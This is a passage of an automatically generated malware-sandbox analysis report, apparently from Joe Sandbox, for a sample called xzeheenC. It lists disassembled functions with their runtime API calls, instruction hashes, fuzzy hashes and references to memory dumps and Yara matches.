                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .5uq
                                                                                                                        • API String ID: 0-910421107
                                                                                                                        • Opcode ID: f31c303c22fdbbefbd617d6ec9d84944ea964447e164cebeeb3f200db977c261
                                                                                                                        • Instruction ID: c6b76fb551e2e161564b2cfd931ff36939c0c0706c4fe4bd2b933b5164b79a49
                                                                                                                        • Opcode Fuzzy Hash: f31c303c22fdbbefbd617d6ec9d84944ea964447e164cebeeb3f200db977c261
                                                                                                                        • Instruction Fuzzy Hash: B8728C75E01228CFDB64DF69C984BDDBBB2AB89300F1081E9D809A7255DB35AE85CF50
                                                                                                                        Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                        • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                        • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                        • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                        Function 20AA5020 Relevance: .3, Instructions: 260COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d3f3d5d067c0b48cb8318e4f8e5b43ff9d76b87c8018704662959155251fe9f0
                                                                                                                        • Instruction ID: dd112697fec3d5c690663f92aaa239d1ef1e2d05af8c55743233e8280a63c26b
                                                                                                                        • Opcode Fuzzy Hash: d3f3d5d067c0b48cb8318e4f8e5b43ff9d76b87c8018704662959155251fe9f0
                                                                                                                        • Instruction Fuzzy Hash: 08D18375E01218CFDB54CFA9D994B9DBBB2BF88300F1081A9D809AB365DB306D85CF51
                                                                                                                        Function 20AA5010 Relevance: .1, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 28ae5d4c3ae2b3aed1bcdd7eb50967cedb5de806dbc23f2ab5262b1c262102c4
                                                                                                                        • Instruction ID: 13d1306850d31bf279aca9a2b766b93347c36583c5fc971d5f7e11c13a73f239
                                                                                                                        • Opcode Fuzzy Hash: 28ae5d4c3ae2b3aed1bcdd7eb50967cedb5de806dbc23f2ab5262b1c262102c4
                                                                                                                        • Instruction Fuzzy Hash: F961A575E01618CFDB54CFAAD980A9DBBF2BF89301F1080A9D419EB355DB309985CF54
                                                                                                                        Function 1CF0E158 Relevance: .1, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3467653762.000000001CF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1cf00000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51276aee1badc6bd996b902d64d2e45c01a417771458ade42d8c08ea1eb73329
                                                                                                                        • Instruction ID: 8a75dc000eaa5576c09235daac17d64915176d76816641e3034d2f4e19bb0778
                                                                                                                        • Opcode Fuzzy Hash: 51276aee1badc6bd996b902d64d2e45c01a417771458ade42d8c08ea1eb73329
                                                                                                                        • Instruction Fuzzy Hash: CA41E0B0D00248CFDB14DFA9D985B9EFBF2BB49700F209129E464A7290D774A885DFA5
                                                                                                                        Function 20CACAD0 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8c26dbbf3d800063269b8c998a673e61b75d51d2e53e12dc9ccd4e64c538779d
                                                                                                                        • Instruction ID: 4586294f14b1689bf12b78ea8563ad0e1b8ed53b06e60260d3b0d93c16bbe6e9
                                                                                                                        • Opcode Fuzzy Hash: 8c26dbbf3d800063269b8c998a673e61b75d51d2e53e12dc9ccd4e64c538779d
                                                                                                                        • Instruction Fuzzy Hash: FB3199B8D052099FCB14CFA9E580ADEFBF5AB49310F20902AE919B7310D774A945CFA4
                                                                                                                        Function 20CADA70 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87f09656660454da4d3f0560ac54862997a08c3be81786d0ef9fc03ae7f93923
                                                                                                                        • Instruction ID: 9b9617335236a5e91f6f83d5b7cc48d04a05cb06e7077bf81ab7c482453ccbc6
                                                                                                                        • Opcode Fuzzy Hash: 87f09656660454da4d3f0560ac54862997a08c3be81786d0ef9fc03ae7f93923
                                                                                                                        • Instruction Fuzzy Hash: C931AAB9D052589FCB10CFA9E580ADEFBF1AF49310F20902AE419B7350D374AA45CF64
                                                                                                                        Function 20D9C5A0 Relevance: .0, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474721924.0000000020D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D90000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20d90000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ffd0b0f4682392c74f270ae788f9ccb9b38f1b7135aa6ac6e40273449dc878c
                                                                                                                        • Instruction ID: 16ac3d0674d55c5b121695c427359beca7d39432a0b06eeff8b4aba482795b8d
                                                                                                                        • Opcode Fuzzy Hash: 7ffd0b0f4682392c74f270ae788f9ccb9b38f1b7135aa6ac6e40273449dc878c
                                                                                                                        • Instruction Fuzzy Hash: 58D09E7AD5626CCACF21DFA8DC605EEF774EF9A311F0024A6C108A7524D73169508F59
                                                                                                                        Function 20AA542C Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: db24eda7b3127d41a2a6cfce6e76ba8f1c3dc74512681e5bc0e933f92b4eb6a1
                                                                                                                        • Instruction ID: b78df2e2ec0db9f5f0b0f437b0fcb1d727dff46f097c484bc582e6ddb2636d3b
                                                                                                                        • Opcode Fuzzy Hash: db24eda7b3127d41a2a6cfce6e76ba8f1c3dc74512681e5bc0e933f92b4eb6a1
                                                                                                                        • Instruction Fuzzy Hash: F4D06779D9512ECACB30DFA4D8507ACB771EB96200F1020A9C418A3552E7305A50AE99
                                                                                                                        Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3809854901-0
                                                                                                                        • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                        • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                        Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                        • String ID: 1.2.3
                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                        • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                        • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                        Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                        Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EntryPoint.XZEHEENC(80070057), ref: 004017EE
                                                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,21CD4C01,2C2D8410), ref: 0040101C
                                                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                        • EntryPoint.XZEHEENC(80070057), ref: 00401800
                                                                                                                        • EntryPoint.XZEHEENC(80070057), ref: 00401813
                                                                                                                        • __recalloc.LIBCMT ref: 00401828
                                                                                                                        • EntryPoint.XZEHEENC(8007000E), ref: 00401839
                                                                                                                        • EntryPoint.XZEHEENC(8007000E), ref: 00401853
                                                                                                                        • _calloc.LIBCMT ref: 00401861
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1721462702-0
                                                                                                                        • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                        • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                        • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                        • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                        Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                        • String ID: @.B
                                                                                                                        • API String ID: 3521780317-470711618
                                                                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                        Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2805327698-0
                                                                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                        Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                        • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4271482742-0
                                                                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                        Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                        Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395185920-0
                                                                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                        Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 208892515-0
                                                                                                                        • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                        • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                        Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __flush.LIBCMT ref: 0040BB6E
